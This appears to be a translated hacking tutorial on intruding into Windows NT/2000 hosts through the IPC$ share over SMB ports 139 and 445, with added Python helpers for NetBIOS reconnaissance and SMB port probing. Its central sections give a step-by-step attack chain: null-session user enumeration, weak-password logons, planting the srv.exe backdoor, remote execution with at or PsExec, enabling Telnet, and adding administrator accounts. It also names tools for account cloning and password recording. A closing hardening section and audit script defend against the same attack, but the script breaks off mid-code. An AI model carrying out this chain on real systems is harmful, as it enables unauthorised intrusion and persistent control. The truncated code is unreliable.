Port 445 Intrusion Explained in Detail

Why has port 445 become the first port intruders look at? Because on Windows 2000 and later, TCP 445 is where SMB is hosted directly over TCP, and SMB is what carries the IPC$ share. Everything below is really about IPC$.
Contents

1. Summary
2. What is IPC$
3. What is a null session
4. What a null session can do
5. The ports IPC$ uses
6. Why IPC pipes matter in an attack
7. Common causes of IPC$ connection failure
8. Reasons a file copy fails
9. Limits of the AT command, and of IPC$ on XP
10. How to open the target's IPC$ share and other shares
11. Operations that require a shell
12. Commands that may be used in an intrusion
13. IPC$ intrusions, past and present
14. How to prevent IPC$ intrusion
15. Selected IPC$ intrusion questions and answers
16. Closing
1. Summary

There are plenty of articles on the Internet about IPC$ intrusion, and the attack steps have hardened into a fixed recipe, so nobody wants to drag out something that has become a cliché.

But I find that these articles are not specific enough, and some of their content is simply wrong. As a result, questions about IPC$ fill nearly half of the discussion areas on security forums, and the same questions come up again and again, which hurts both the quality of the forums and the efficiency of learning. So I have put this article together in the hope of making IPC$ as clear as possible.

Note: every scenario in this article assumes a Windows NT/2000 environment; Windows 98 is not covered.
2. What is IPC$

IPC$ (the Inter-Process Communication share; many articles expand it as "Internet Process Connection", which is wrong) is a hidden share that exposes named pipes for communication between processes. By presenting a trusted user name and password, the two sides establish an authenticated session and exchange data over it, which lets the client reach resources on the remote computer. IPC$ appeared with NT, and it has one notable property: between a given pair of hosts only one set of credentials may be in use at a time (see error 1219 in section 7).

When NT/2000 provides the IPC$ share, it also turns on the default (administrative) shares when the system is first installed: every logical drive (C$, D$, E$ ...) and the system directory WINNT or Windows (ADMIN$). Microsoft's intention was to make remote administration convenient, but, intentionally or not, the result is a reduction in system security.

People often talk about "the IPC$ vulnerability". In fact IPC$ is not a vulnerability in the true sense; I think the people who say that are referring to the "back door" Microsoft itself left in place: the null session.

So what is a null session?
3. What is a null session

Before introducing the null session, it helps to understand how an authenticated session is built.

Windows NT 4.0 uses a challenge/response protocol (NTLM) to establish a session with a remote machine. Once established, the session acts as a secure tunnel through which the two parties exchange information. The process runs roughly as follows:

1) The session requester (client) sends a packet to the session recipient (server) asking to establish the session;
2) The server generates a random 64-bit (8-byte) number, the challenge, and returns it to the client;
3) The client takes the 64-bit challenge, encrypts it using a hash of the password of the account it is trying to log on with, and returns the result to the server as the response;
4) The server passes the response to the Local Security Authority (LSA). If the requested account is local to the server, the LSA verifies the response using the correct password hash for that user; if it is a domain account, the response is forwarded to a domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and handed to the client, which uses that token to access resources on the server until the session is torn down.
That is the general procedure for establishing an authenticated session. So what is a null session?
A null session is a session established with the server without presenting credentials (no user name and no password), and it is still subject to the Windows 2000 access-control model. Establishing a null session requires a token, but because no user information is authenticated during establishment, the token contains no user information either. Such a session cannot be used to send encrypted data between the two systems. That does not mean the token lacks a security identifier (a SID identifies the user and the groups it belongs to): the SID the LSA places in a null session's token is S-1-5-7, the SID of the ANONYMOUS LOGON account (this user name appears in user lists, but it is not in the SAM database; it is a built-in account of the system). On NT/2000 this access token also includes the following groups:

Everyone
Network

(From Windows XP and Server 2003 onward, anonymous logons are no longer members of Everyone by default.) Within the limits set by security policy, a null session on NT/2000 is therefore granted access to whatever those two groups are permitted to access. So what can be done with a null session?
4. What a null session can do

Under NT's default security settings, a null session can enumerate the users and shares on the target host, access shares that grant permission to Everyone, read a small amount of registry information, and so on. None of that is especially valuable, and on 2000 the effect is smaller still, because from Windows 2000 onward only Administrators and Backup Operators may access the registry over the network by default, and doing any of this by hand is inconvenient enough that tools are needed.

From this it might seem that such an untrusted session is of little use. But viewed as part of a complete IPC$ intrusion, the null session is an indispensable stepping stone, because it yields the user list, and most weak-password scanners guess passwords against exactly that list. Exporting the user list greatly raises the success rate of guessing, which is enough to show why the null session matters for security. So it is wrong to say null sessions are useless. Here are some specific commands you can use through a null session:

1. First, establish the null session (which of course requires that the target has IPC$ open)

Command: net use \\ip\ipc$ "" /user:""

Note: the command contains four spaces: one between net and use, one after use, and one on each side of the empty password "".
2. View the shared resources of a remote host

Command: net view \\ip

Explanation: once the null session is established, this command lists the remote host's shares. If the host has shares open, you get output like the following. This command cannot display the default (hidden) shares.

Shared resources at \\*.*.*.*

Share name   Type   Used as   Comment
-----------------------------------------------------------
NETLOGON     Disk             Logon server share
SYSVOL       Disk             Logon server share
The command completed successfully.
3. View the current time of a remote host

Command: net time \\ip

Explanation: this command returns the current time of the remote host.
4. Get the NetBIOS name table of a remote host (requires NetBIOS over TCP/IP, NBT, to be enabled on your own machine)

Command: nbtstat -A ip

This returns the remote host's NetBIOS name table, for example:

Node IpAddress: [*.*.*.*] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    SERVER         <00>  UNIQUE      Registered
    OYAMANISHI-H   <00>  GROUP       Registered
    OYAMANISHI-H   <1C>  GROUP       Registered
    SERVER         <20>  UNIQUE      Registered
    OYAMANISHI-H   <1B>  UNIQUE      Registered
    OYAMANISHI-H   <1E>  GROUP       Registered
    SERVER         <03>  UNIQUE      Registered
    OYAMANISHI-H   <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    INet~Services  <1C>  GROUP       Registered
    IS~SERVER......<00>  UNIQUE      Registered

    MAC Address = 00-50-8B-9A-2D-37

The suffix in angle brackets tells you what each name is registered for: <00> UNIQUE is the host name and <00> GROUP its domain or workgroup, <20> means the Server service is running (so SMB shares are reachable), <1C> GROUP lists domain controllers, <1B> is the domain master browser (the PDC), <1D> and __MSBROWSE__ mark the master browser, <03> the Messenger service, and the INet~Services and IS~hostname entries indicate IIS. The table above therefore describes a domain controller running IIS.
That is what we commonly do with null sessions; it looks like quite a lot can be learned. One thing to note: establishing an IPC$ connection leaves a record in the target's event log whether or not the logon succeeds. Now let's look at which ports IPC$ uses.
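To turn a name table like the one above into something actionable, here is an added example (not from the original article) that parses nbtstat -A output and applies the well-known suffix meanings: <00> UNIQUE is the host name, <00> GROUP the domain or workgroup, <20> the Server service, <1C> GROUP domain controllers, <1B> the domain master browser (PDC), <1D> and __MSBROWSE__ the master browser, <03> the Messenger service, and INet~Services / IS~hostname indicate IIS. The sample text is the table from above re-typed with a TEST-NET address (a constructed sample), and run_nbtstat only works on Windows.

```python
import re
import subprocess
from typing import Dict, List, NamedTuple, Optional, Set, Tuple


class NbEntry(NamedTuple):
    name: str
    suffix: int    # the <xx> byte
    kind: str      # UNIQUE or GROUP
    status: str


# Constructed sample: the nbtstat -A output quoted above, with a TEST-NET address.
SAMPLE_NBTSTAT = """\
Node IpAddress: [192.0.2.10] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    SERVER         <00>  UNIQUE      Registered
    OYAMANISHI-H   <00>  GROUP       Registered
    OYAMANISHI-H   <1C>  GROUP       Registered
    SERVER         <20>  UNIQUE      Registered
    OYAMANISHI-H   <1B>  UNIQUE      Registered
    OYAMANISHI-H   <1E>  GROUP       Registered
    SERVER         <03>  UNIQUE      Registered
    OYAMANISHI-H   <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    INet~Services  <1C>  GROUP       Registered
    IS~SERVER......<00>  UNIQUE      Registered

    MAC Address = 00-50-8B-9A-2D-37
"""

_ROW = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.I)
_MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})", re.I)


def parse_name_table(text: str) -> Tuple[List[NbEntry], Optional[str]]:
    """Parse nbtstat -A output into entries plus the MAC address, if printed."""
    entries = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            entries.append(NbEntry(m.group(1), int(m.group(2), 16), m.group(3).upper(), m.group(4)))
    mac = _MAC.search(text)
    return entries, (mac.group(1).upper() if mac else None)


def summarize(entries: List[NbEntry]) -> Dict[str, object]:
    """Map suffixes to the host name, domain and server roles they advertise."""
    roles: Set[str] = set()
    info: Dict[str, object] = {"hostname": None, "domain": None, "roles": roles}
    for e in entries:
        n = e.name.rstrip(".").upper()          # trailing dots are display padding
        if n.startswith("IS~"):
            roles.add("IIS")
        elif e.suffix == 0x00 and e.kind == "UNIQUE":
            info["hostname"] = n
        elif e.suffix == 0x00 and e.kind == "GROUP":
            info["domain"] = n
        elif e.suffix == 0x20 and e.kind == "UNIQUE":
            roles.add("file server (Server service)")
        elif e.suffix == 0x03 and e.kind == "UNIQUE":
            roles.add("Messenger service")
        elif e.suffix == 0x1B and e.kind == "UNIQUE":
            roles.add("domain master browser (PDC)")
        elif e.suffix == 0x1C and e.kind == "GROUP":
            roles.add("IIS" if n == "INET~SERVICES" else "domain controller")
        elif e.suffix == 0x1D and e.kind == "UNIQUE":
            roles.add("master browser")
        elif e.suffix == 0x01 and "__MSBROWSE__" in n:
            roles.add("master browser")
        elif e.suffix == 0x1E and e.kind == "GROUP":
            roles.add("browser elections")
    return info


def run_nbtstat(ip: str) -> str:
    """Windows only: run the real command and return its text for parse_name_table()."""
    return subprocess.run(["nbtstat", "-A", ip], capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    ents, mac = parse_name_table(SAMPLE_NBTSTAT)
    print(mac, summarize(ents))
```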
5. The ports IPC$ uses

First some basics:

1. SMB (Server Message Block) is the Windows protocol family for file and print sharing services;
2. NBT (NetBIOS over TCP/IP) uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to carry NetBIOS over TCP/IP;
3. In Windows NT, SMB runs on top of NBT, that is, over TCP port 139. In Windows 2000, SMB can also run directly over TCP port 445 in addition to the NBT-based path.

With that in place we can discuss which port a network share (and therefore an IPC$ session) ends up using.

For a Windows 2000 client (the initiator):

1. If NBT is enabled, the client tries ports 139 and 445 at the same time. If 445 answers, the client sends an RST to port 139 to tear that connection down and uses 445 for the session. If 445 does not answer, it uses 139. If neither answers, the session fails;
2. If NBT is disabled, the client tries only port 445. If 445 does not answer, the session fails.

For a Windows 2000 server (the responder):

1. If NBT is enabled, UDP ports 137 and 138 and TCP ports 139 and 445 are all open (LISTENING);
2. If NBT is disabled, only port 445 is open.

The IPC$ sessions we establish follow exactly the same port-selection rules.

Obviously, if the remote server is listening on neither 139 nor 445, no IPC$ session can be established.
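The client-side rule above, as an added example that is not part of the original article. probe_smb_ports connects to 445 and 139 in parallel with non-blocking sockets, the way the text describes the Windows 2000 redirector behaving, and pick_smb_port applies the preference rule and closes the losing 139 connection with SO_LINGER set to zero so that the kernel emits an RST rather than a FIN. Nothing here is taken from Microsoft's implementation, and the host address in the usage line is a placeholder.

```python
import errno
import selectors
import socket
import struct
import time
from typing import Dict, Optional, Tuple

SMB_DIRECT = 445   # SMB hosted directly on TCP (Windows 2000 and later)
SMB_NBT = 139      # SMB over the NetBIOS session service

# connect_ex() results that mean "handshake started" on a non-blocking socket
_IN_PROGRESS = {0, errno.EINPROGRESS, errno.EWOULDBLOCK, errno.EAGAIN}


def choose_port(nbt_enabled: bool, responded: Dict[int, bool]) -> Optional[int]:
    """The Windows 2000 client rule from the text: 445 wins, 139 only as an NBT fallback."""
    if responded.get(SMB_DIRECT):
        return SMB_DIRECT
    if nbt_enabled and responded.get(SMB_NBT):
        return SMB_NBT
    return None


def rst_close(sock: socket.socket) -> None:
    """Abortive close: SO_LINGER with a zero timeout makes the kernel send RST, not FIN."""
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0))
    sock.close()


def probe_smb_ports(host: str, nbt_enabled: bool = True,
                    timeout: float = 3.0) -> Dict[int, Optional[socket.socket]]:
    """Connect to 445 and (with NBT) 139 in parallel; map each port to its open socket or None."""
    ports = [SMB_DIRECT, SMB_NBT] if nbt_enabled else [SMB_DIRECT]
    result: Dict[int, Optional[socket.socket]] = {p: None for p in ports}
    sel = selectors.DefaultSelector()
    pending = 0
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setblocking(False)
        if s.connect_ex((host, port)) not in _IN_PROGRESS:
            s.close()                          # failed immediately (no route, etc.)
            continue
        sel.register(s, selectors.EVENT_WRITE, port)
        pending += 1
    deadline = time.monotonic() + timeout
    while pending and (left := deadline - time.monotonic()) > 0:
        for key, _ in sel.select(left):        # writable == connect finished (ok or error)
            s, port = key.fileobj, key.data
            sel.unregister(s)
            pending -= 1
            if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0:
                result[port] = s               # three-way handshake completed
            else:
                s.close()                      # refused or unreachable
    for key in list(sel.get_map().values()):   # still pending at the deadline
        sel.unregister(key.fileobj)
        key.fileobj.close()
    sel.close()
    return result


def pick_smb_port(host: str, nbt_enabled: bool = True,
                  timeout: float = 3.0) -> Tuple[Optional[int], Optional[socket.socket]]:
    """Probe, apply the rule, and tear down the loser (RST on 139, as the text describes)."""
    conns = probe_smb_ports(host, nbt_enabled, timeout)
    chosen = choose_port(nbt_enabled, {p: s is not None for p, s in conns.items()})
    for port, s in conns.items():
        if s is not None and port != chosen:
            rst_close(s)
    return chosen, (conns[chosen] if chosen is not None else None)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"   # placeholder address
    port, sock = pick_smb_port(target)
    print("an IPC$ session to", target, "would use port", port)
    if sock is not None:
        sock.close()
```

Run it against a host you are allowed to test; a result of None for the port is exactly the case the last paragraph describes, where neither 139 nor 445 is reachable and no IPC$ session is possible.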
6. Why IPC pipes matter in an attack

IPC pipes were designed to make remote administration convenient for administrators. In the intruder's eyes, however, a host with IPC open looks that much easier to get into.

Through IPC we can invoke some system functions remotely (mostly via tools, and only with the corresponding permissions), and that is often the key to a successful intrusion.

Even leaving that aside, IPC has already given intruders a great deal of help and has become the most important channel for moving files onto a target, which is why you constantly see people on forums at a loss because they cannot open the target's IPC pipe. Nor can the role of permissions be overlooked: you have surely tasted the frustration of a null session, where the pipe is open but without privileges there is nothing you can do. Once the intruder holds administrator credentials, though, the double-edged sword of IPC shows its other face.
7. Common causes of IPC$ connection failure

The following are common reasons an IPC$ connection fails:

1. IPC connections are a feature of Windows NT and later, because they depend on many DLL functions specific to NT. They cannot be made from Windows 9x/ME. In other words, only NT/2000/XP can establish IPC$ connections with one another; 98/ME cannot;
2. An IPC$ connection, even a null one, requires that the responder has the IPC$ share enabled. If the responder has removed the IPC$ share, no connection can be established;
3. The initiator has not started the LanmanWorkstation service (display name: Workstation). It provides network connections and communication; without it the initiator cannot send a connection request;
4. The responder has not started the LanmanServer service (display name: Server). It provides RPC support, file, print and named-pipe sharing, and IPC$ depends on it. Without it the host cannot answer the initiator's connection request, although it can still initiate IPC$ connections of its own;
5. The responder has not started NetLogon, which supports pass-through authentication of accounts on the network (rare);
6. Ports 139 and 445 on the responder are not listening or are blocked by a firewall;
7. The initiator has ports 139 and 445 blocked;
8. Wrong user name or password: the system reports a logon failure (error 1326 below). Null sessions obviously cannot produce this error;
9. Typing error: usually a space too many or too few. When the user name and password contain no spaces, the quotation marks around them may be omitted; when the password is empty, type two double quotes "" directly;
10. If the other side reboots after the connection was established, the IPC$ connection is dropped and must be re-established.

You can also diagnose the cause from the error number returned:

Error 5, access denied (ERROR_ACCESS_DENIED): the account you are using is most likely not an administrator;
Error 51, Windows cannot find the network path (ERROR_REM_NOT_LIST): a network problem;
Error 53, the network path was not found (ERROR_BAD_NETPATH): wrong IP address, the target is powered off, the target's LanmanServer service is not running, or the target has a firewall filtering the ports;
Error 67, the network name cannot be found (ERROR_BAD_NET_NAME): your LanmanWorkstation service is not running, or the target has deleted IPC$;
Error 1219, the supplied credentials conflict with an existing set of credentials (ERROR_SESSION_CREDENTIAL_CONFLICT): you already have an IPC$ connection to this host; delete it and reconnect;
Error 1326, unknown user name or bad password (ERROR_LOGON_FAILURE): the cause is obvious;
Error 1792, an attempt was made to log on but the network logon service was not started (ERROR_NETLOGON_NOT_STARTED): the target's NetLogon service is not running;
Error 2242, the user's password has expired (NERR_PasswordExpired): the target enforces an account policy requiring periodic password changes.
8. Reasons a file copy fails

Some people establish the IPC$ connection successfully but then run into trouble with copy and cannot get the file across. What are the common causes?

1. The other side has no shared directory open

This is the most common error, accounting for more than half of the cases. Many people, having established the IPC$ connection, copy blindly without even knowing whether the other side has a shared directory, then are dismayed when the copy fails. So before copying, always use net view \\ip to check whether the shared directory you want to copy to exists (better still, use a scanner). Do not assume that because an IPC$ connection can be established there must be a shared directory.

2. Copying to a default share fails

This mistake is also common and has two main aspects:

1) Assuming that any host that accepts an IPC$ connection must have the default shares on, and therefore copying to C$, D$, ADMIN$ and so on as soon as the connection is up. If the other side has turned off the default shares, the copy fails. A successful IPC$ connection only means the other side has the IPC$ share; it says nothing about whether the default shares exist. The IPC$ share is not the same thing as the default shares: IPC$ is a named pipe, not a directory, while the default shares are real shared directories;
2) Because net view \\ip cannot display the default shares (their names end in $), this command cannot tell you whether the other side has the default shares on. If the default shares are off, every operation against them fails. Most scanners, however, check for the default shares at the same time as they scan for weak passwords, which avoids this class of error.

Key point: be sure to distinguish IPC$, the default shares and ordinary shares. IPC$ is a pipe, not a shared directory; the default shares are the directories shared automatically at installation; ordinary shares are shared directories on which we can set permissions ourselves.

3. Insufficient permissions, in four scenarios:

1) Copying to any share (default or ordinary) over a null session: the permissions are insufficient;
2) Copying to a default share: on Windows 2000 Professional only members of Administrators and Backup Operators have sufficient rights; on Windows 2000 Server members of Server Operators can also access these directories;
3) Copying to an ordinary share: you must have the corresponding permission (the access rights the other side's administrator set beforehand);
4) The other side may use a firewall or security software to forbid external access to shares.

Attention:

1. Do not assume that an account named "administrator" has administrator rights; the administrator account can be renamed.
2. An administrator can always access the default shares but not necessarily an ordinary share, because the administrator can set permissions on the ordinary share. For example, if the administrator shares the D drive and grants access only to a user named xinxin, then even with administrator privileges you still cannot get into that share of the D drive. The interesting part is that if the D$ default share is on at the same time, you can reach the D drive through D$ and bypass the share's permission limit. Interested readers can test this themselves.

4. Killed by a firewall, or the target is inside a LAN

In another case your copy actually succeeded, but when you try to run the file remotely it is killed by a firewall, so it cannot be found; or you copied a Trojan onto a host inside a LAN, so the connection back to it fails (reverse-connecting Trojans do not have this problem). If you don't think of this you may believe the copy failed, when in fact it succeeded and the execution is what went wrong.

As you can see, all kinds of problems turn up in practice with IPC$ connections. The above are just the common mistakes I have summarized; if I have missed any, please remind me.
9. Limits of the AT command, and of IPC$ on XP

I also wanted to go into why remote execution with at fails, but since at's success rate is not high and it has many problems I will not cover it here. Instead I recommend PsExec.exe for remote execution. To have the remote machine run the local file C:\xinxin.exe, with the administrator account administrator and password 1234, enter:

psexec \\ip -u administrator -p 1234 -c C:\xinxin.exe

If an IPC$ connection already exists, the -u and -p parameters can be omitted; with -c, PsExec copies the file to the remote machine and runs it.

I did not intend to discuss IPC$ on XP here, meaning to treat it separately, but more and more people are asking why most operations fail when they run into XP, so I will mention it briefly. Under XP's default security options ("Network access: Sharing and security model for local accounts" set to "Guest only", the default for XP machines not joined to a domain), any remote logon with a local account is granted only Guest permissions. That means that even with the administrator's user name and password you get Guest rights, so most operations fail for lack of permission, and so far there is no good way around it from outside. If you really have an XP administrator password, I suggest avoiding the IPC pipe altogether.
10. How to open the target's IPC$ share and other shares

A target's IPC$ is not something you can simply open from outside, or the world would be in chaos. You need a shell with administrator privileges on the target (Telnet, a Trojan, a redirected cmd, and so on), then run under that shell:

net share ipc$

to open the target's IPC$ share, and

net share ipc$ /del

to close it. To open a shared directory, use:

net share xinxin=c:\

which shares the C drive under the share name xinxin. (I have seen many people believe that the command to share a drive is net share c$, and even point newcomers at it, which is really harmful.) Again, all of these run in a shell on the target.
11. Operations that require a shell

Many tutorials are inaccurate here: they present commands that can only run in a shell on the target as if they could be run over a bare IPC$ connection, which is misleading. So here is a summary of what must be done from a shell:

1. Creating a user on the remote host, activating a user, changing a user's password, or adding a user to the Administrators group;
2. Opening the remote host's IPC$ share, default shares or ordinary shares;
3. Starting or stopping services on the remote host;
4. Starting or killing processes on the remote host (tools such as PsKill are the exception).
12. Commands that may be used in an intrusion

For completeness I list the commands frequently used in an IPC$ intrusion. If you already know them, skip to the next section.

Note whether each command acts locally or remotely. A command that only acts locally must be run in a shell on the remote host (cmd over Telnet and the like) to take effect there.

1. Creating and deleting IPC$ connections

1) Establish a null session:
net use \\127.0.0.1\ipc$ "" /user:""
2) Establish an authenticated connection:
net use \\127.0.0.1\ipc$ "password" /user:"username"
3) Delete the connection:
net use \\127.0.0.1\ipc$ /del

2. Commands that act on the remote host over an IPC$ connection

1) View the remote host's shares (default shares are not shown):
net view \\127.0.0.1
2) View the remote host's current time:
net time \\127.0.0.1
3) Get the remote host's NetBIOS name table:
nbtstat -A 127.0.0.1
4) Map and unmap a remote share:
net use Z: \\127.0.0.1\c
maps the share named c to the local drive Z:;
net use Z: /del
removes the mapped Z: drive. Other drive letters work the same way.
5) Copy files to the remote host:
copy path\filename \\ip\sharename, for example
copy C:\xinxin.exe \\127.0.0.1\c$
copies xinxin.exe from the local C drive to the other side's C drive. You can also copy files from the remote host to your own machine:
copy \\127.0.0.1\c$\xinxin.exe c:\
6) Add a scheduled task on the remote host:
at \\ip time program, for example
at \\127.0.0.1 11:00 xinxin.exe
Note: use the 24-hour clock. If the program is not in the system's default search path (for example system32), give its full path.
3. Local commands

1) View the local host's shares (the default shares are visible here):
net share
2) List the local user accounts:
net user
3) Show a local user's account details:
net user accountname
4) List the services currently running on the local host:
net start
5) Start and stop a local service:
net start servicename
net stop servicename
6) Add a local account:
net user accountname password /add
7) Activate a disabled user:
net user accountname /active:yes
8) Add an account to the Administrators group:
net localgroup Administrators accountname /add

Obviously, although these are local commands, if you type them in a shell on the remote host (for example after a successful Telnet logon), "local" means the remote host.
4. Some other commands

1) Telnet
telnet ip port
telnet 127.0.0.1 23
2) Use OpenTelnet.exe to enable Telnet on the remote host
OpenTelnet.exe \\ip administrator-account password NTLM-authentication-mode port
OpenTelnet.exe \\127.0.0.1 Administrator "" 1 90
This tool has four requirements:
1) The target has the IPC$ share open;
2) You have the administrator account name and password;
3) The target's RemoteRegistry service is running, so the NTLM authentication mode can be changed;
4) It works only against Windows 2000/XP.
3) Use PsExec.exe to get a shell in one step (requires the IPC pipe)
psexec \\ip -u administrator-account -p password cmd
psexec \\127.0.0.1 -u administrator -p "" cmd
13. IPC$ intrusions, past and present

Since this is a comparison, let me first write out the classic IPC$ intrusion steps of the past:

[1]
C:\>net use \\127.0.0.1\ipc$ "" /user:administrator
\\ Connect with an empty administrator password found by a scanner
[2]
C:\>net view \\127.0.0.1
\\ List the remote host's shares
[3]
C:\>copy srv.exe \\127.0.0.1\admin$\system32
\\ Copy the one-shot back door srv.exe into the other side's system directory; requires ADMIN$ to be open
[4]
C:\>net time \\127.0.0.1
\\ Check the remote host's current time
[5]
C:\>at \\127.0.0.1 time srv.exe
\\ Run srv.exe remotely with the at command; requires the other side's Task Scheduler service to be running
[6]
C:\>net time \\127.0.0.1
\\ Check the time again to estimate whether srv.exe has run yet; this step can be omitted
[7]
C:\>telnet 127.0.0.1 99
\\ Open a new window and telnet to 127.0.0.1 to get a shell (a shell is, for our purposes, control of the remote machine through DOS-like commands). Port 99 is the one opened by the one-shot back door srv.exe
[8]
C:\winnt\system32>net start telnet
\\ In the shell we just obtained, start the remote machine's Telnet service. srv.exe is a one-shot back door; we need a lasting one for later access. If the other side's Telnet is already running, skip this step
[9]
C:\>copy ntlm.exe \\127.0.0.1\admin$\system32
\\ From the original window, upload ntlm.exe, which changes Telnet's authentication mode
[10]
C:\winnt\system32>ntlm.exe
\\ Run ntlm.exe in the shell window; afterwards you can telnet straight to this host
[11]
C:\>telnet 127.0.0.1 23
\\ Telnet to 127.0.0.1 in the new window (port 23 may be omitted). Now we have a lasting back door
[12]
C:\winnt\system32>net user accountname password /add
C:\winnt\system32>net user guest /active:yes
C:\winnt\system32>net localgroup Administrators accountname /add
\\ Once logged in over Telnet, you can create a new account, activate Guest, add any account to the Administrators group, and so on.

Alright, writing this I feel I am back two or three years: that was IPC$ in its day. With the arrival of new tools, some of the tools and commands above are used less now. So let's look at today's efficient, simple IPC$ intrusion:

[1]
psexec \\ip -u administrator-account -p password cmd
\\ With this tool we get a shell in one step
OpenTelnet.exe \\server administrator-account password NTLM-authentication-mode port
\\ Or use this to change Telnet's authentication mode and port, which makes logging in convenient
[2]
There is no second step. Once you have the shell you can do anything: use WinShell for a back door, CA for account cloning, 3389.vbe to enable Terminal Services, Win2kPass to record passwords. There are many good tools; the choice is yours, and I won't go on.
14. How to prevent IPC$ intrusion

1. Stop null sessions from enumerating (this does not prevent the null session from being established)

Run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] and set the DWORD value RestrictAnonymous to 1.

With the value 1, anonymous users can still connect to the IPC$ share, but the connection is not allowed to enumerate SAM accounts or share information. Windows 2000 added the value 2, with which users without explicit anonymous permissions cannot establish a null IPC$ connection at all; note that 2 can break legitimate functions that rely on anonymous access (browsing, some domain operations), which is why the recommended setting is 1.

If the value does not exist, create it and then set it.

If you would rather not touch the registry, set it under Local Security Settings - Local Policies - Security Options - "Additional restrictions for anonymous connections".

2. Disable the default shares

1) View the local shares
Run cmd and type net share
2) Delete the shares (the default shares come back after a reboot)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (and likewise e$, f$, ...)
3) Stop the Server service
net stop server /y (the shares return when the Server service is started again)
4) Stop the system from recreating the default shares at boot (this does not close the IPC$ share)
Run regedit.
Server editions: under [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] set the DWORD value AutoShareServer to 0.
Professional: under the same key set the DWORD value AutoShareWks to 0.
Neither value exists by default; add it by hand. Restart the machine for the change to take effect.

3. Stop the service that IPC$ and the default shares depend on: the Server service

If you really want to turn off the IPC$ share, disable the Server service:
Control Panel - Administrative Tools - Services - right-click the Server service - Properties - General - Startup type - Disabled. You may be warned that other services will also stop because they depend on the Server service; ignore it.

4. Block ports 139 and 445

Without those two ports, IPC$ cannot be established, so blocking 139 and 445 also prevents IPC$ intrusion.
1) Port 139 can be closed by disabling NBT
Local Area Connection - TCP/IP Properties - Advanced - WINS - select "Disable NetBIOS over TCP/IP"
2) Port 445 can be closed through the registry
Add a value:
Hive: HKEY_LOCAL_MACHINE
Key: SYSTEM\CurrentControlSet\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
Restart the machine after the change.
Note: with both ports blocked you can no longer use IPC$ against others either.
3) Install a firewall and filter the ports

5. Use strong passwords to defeat password guessing over IPC$. I think this is the best measure: better security awareness is more reliable than endless patching.
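An added example, not part of the original article, that audits the settings this section describes: a host's RestrictAnonymous, AutoShareServer/AutoShareWks and SMBDeviceEnabled values, plus which of TCP 139 and 445 are listening, are checked against the hardened state. The two settings dictionaries and the netstat text are constructed samples; read_live_settings reads the real values with winreg and only works on Windows; the registry paths are the ones given above.

```python
import re
from typing import Dict, List, Optional, Set, Tuple

# Registry locations named in the section above.
LSA = r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa"
LANMAN = r"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
NETBT = r"HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters"

# (key path, value name) -> DWORD, or None when the value is absent
Settings = Dict[Tuple[str, str], Optional[int]]

# Constructed samples: a stock Windows 2000 Server, and the same host after this section's steps.
STOCK_W2K_SERVER: Settings = {
    (LSA, "RestrictAnonymous"): 0,
    (LANMAN, "AutoShareServer"): None,
    (NETBT, "SMBDeviceEnabled"): None,
}
STOCK_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.0.2.10:139         0.0.0.0:0              LISTENING
  UDP    192.0.2.10:137         *:*
"""
HARDENED: Settings = {
    (LSA, "RestrictAnonymous"): 1,
    (LANMAN, "AutoShareServer"): 0,
    (NETBT, "SMBDeviceEnabled"): 0,
}
HARDENED_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
"""


def listening_tcp_ports(netstat_text: str) -> Set[int]:
    """Pull LISTENING TCP ports out of `netstat -an` output (Windows format)."""
    ports: Set[int] = set()
    for line in netstat_text.splitlines():
        m = re.match(r"\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING", line, re.I)
        if m:
            ports.add(int(m.group(1)))
    return ports


def assess(settings: Settings, is_server: bool, listening: Set[int]) -> List[str]:
    """One finding per weakness; an empty list means the host matches the hardened state."""
    findings: List[str] = []
    if not settings.get((LSA, "RestrictAnonymous")):            # absent or 0
        findings.append("RestrictAnonymous is absent or 0: null sessions can enumerate "
                        "accounts and shares; set it to 1")
    auto = "AutoShareServer" if is_server else "AutoShareWks"
    if settings.get((LANMAN, auto)) != 0:
        findings.append(f"{auto} is not 0: C$, D$ ... and ADMIN$ are recreated at every boot")
    if 445 in listening:
        sde = settings.get((NETBT, "SMBDeviceEnabled"))
        findings.append("TCP 445 is listening: direct-hosted SMB is reachable"
                        + ("; reboot pending" if sde == 0 else "; set SMBDeviceEnabled=0 and reboot"))
    if 139 in listening:
        findings.append("TCP 139 is listening: NetBIOS over TCP/IP is enabled; disable it on the adapter")
    return findings


def read_live_settings() -> Settings:
    """Windows only: read the values with winreg; returns {} on other platforms."""
    try:
        import winreg
    except ImportError:
        return {}
    out: Settings = {}
    for key, name in ((LSA, "RestrictAnonymous"), (LANMAN, "AutoShareServer"),
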